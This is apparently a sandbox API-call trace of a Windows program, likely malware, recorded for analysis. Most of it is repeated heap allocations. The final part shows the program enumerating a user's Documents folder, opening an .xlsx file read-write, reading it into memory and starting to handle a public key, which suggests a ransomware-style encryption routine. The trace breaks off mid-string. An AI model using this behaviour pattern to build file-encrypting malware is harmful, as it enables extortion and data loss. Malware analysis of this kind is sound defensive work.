[0237.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0237.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0237.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0237.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0237.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0237.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0237.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0237.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.464] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\") returned="Ji_heo\\" [0237.464] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0237.464] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.464] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.464] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.464] PathFindFileNameW (pszPath="") returned="" [0237.464] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcff48890, ftCreationTime.dwHighDateTime=0x1d5baa4, ftLastAccessTime.dwLowDateTime=0x18912570, ftLastAccessTime.dwHighDateTime=0x1d5bef8, ftLastWriteTime.dwLowDateTime=0x18912570, ftLastWriteTime.dwHighDateTime=0x1d5bef8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0237.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.466] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcff48890, ftCreationTime.dwHighDateTime=0x1d5baa4, ftLastAccessTime.dwLowDateTime=0x18912570, ftLastAccessTime.dwHighDateTime=0x1d5bef8, ftLastWriteTime.dwLowDateTime=0x18912570, ftLastWriteTime.dwHighDateTime=0x1d5bef8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.466] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd30875d0, ftCreationTime.dwHighDateTime=0x1d5b9d4, ftLastAccessTime.dwLowDateTime=0x1b4ac430, ftLastAccessTime.dwHighDateTime=0x1d5ba37, ftLastWriteTime.dwLowDateTime=0x1b4ac430, ftLastWriteTime.dwHighDateTime=0x1d5ba37, nFileSizeHigh=0x0, nFileSizeLow=0x1b3f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dF-4SRgpmpphXDcG.xlsx", cAlternateFileName="DF-4SR~1.XLS")) returned 1 [0237.466] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\dF-4SRgpmpphXDcG.xlsx") returned=".xlsx" [0237.466] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\dF-4SRgpmpphXDcG.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\df-4srgpmpphxdcg.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.467] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=6975) returned 1 [0237.467] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.470] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1b19, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.470] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.472] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x1b3f, lpOverlapped=0x0) returned 1 [0237.473] lstrlenA (lpString="-----BEGIN PUBLIC 